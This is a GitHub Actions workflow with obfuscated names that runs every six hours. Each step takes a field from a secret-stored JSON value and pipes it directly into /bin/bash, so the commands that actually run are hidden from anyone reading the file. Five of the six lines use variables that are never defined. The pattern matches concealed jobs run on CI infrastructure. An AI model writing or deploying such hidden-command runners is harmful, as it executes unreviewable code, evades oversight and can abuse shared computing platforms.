name: wenhaoxuan3191

on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wenhaoxuan3191
        env:
          wq5: ${{ secrets.wq5 }}
        run: |
          echo $wq5 | jq -r .vxr49 | /bin/bash
          echo $aoyf92502 | jq -r .o83 | /bin/bash
          echo $k61 | jq -r .jmhy1096 | /bin/bash
          echo $hqq72 | jq -r .n906 | /bin/bash
          echo $r1436 | jq -r .nj329 | /bin/bash
          echo $d019 | jq -r .gq425 | /bin/bash

